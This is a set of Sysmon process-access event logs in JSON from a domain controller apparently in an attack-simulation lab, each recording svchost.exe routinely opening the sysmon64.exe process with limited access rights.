{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1506,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1507,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1508,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1509,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1510,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1511,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1512,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1513,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
